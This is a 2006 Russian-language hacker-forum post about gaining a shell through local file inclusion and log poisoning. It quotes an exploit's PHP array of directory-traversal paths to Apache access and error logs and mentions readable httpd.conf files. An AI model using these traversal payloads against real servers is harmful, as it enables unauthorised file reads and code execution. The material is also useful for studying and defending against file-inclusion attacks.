Тема: Локальный include как способ получть шелл
Показать сообщение отдельно

  #4  
Старый 01.09.2006, 21:06
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами:
11269766

Репутация: 345


По умолчанию
способ стар как мир, просто мало о нем кто думает в первую очередь...

уже давно сплойты перебирают всевозможные локации логов.
http://securityreason.com/exploitalert/1100
Цитата:
$paths=array(
"../../../../../../../../../../../../var/log/httpd/access_log",
"../../../../../../../../../../../../var/log/httpd/error_log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/error.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/error.log",
"../../../../../../../../apache/logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../../logs/error.log",
"../../../../../../logs/access.log",
"../../../../../../../logs/error.log",
"../../../../../../../logs/access.log",
"../../../../../../../../logs/error.log",
"../../../../../../../../logs/access.log",
"../../../../../../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../../../../../../var/www/logs/access_log",
"../../../../../../../../../../../../var/www/logs/access.log",
"../../../../../../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../../../../../../var/log/apache/access_log",
"../../../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/www/logs/error_log",
"../../../../../../../../../../../../var/www/logs/error.log",
"../../../../../../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../../../../../../var/log/apache/error_log",
"../../../../../../../../../../../../var/log/apache/error.log",
"../../../../../../../../../../../../var/log/access_log",
"../../../../../../../../../../../../var/log/error_log"
);
часто есть права на чтение /etc/httpd/conf/httpd.conf или /etc/apache/conf/httpd.conf, ну или /etc/apache2/conf/httpd.conf


Парни не забываем, что если еррор лог (или акцесс) больше максимального размера (установленного в настройках пхп) то появится лишь ошибка класса warning
 
Ответить с цитированием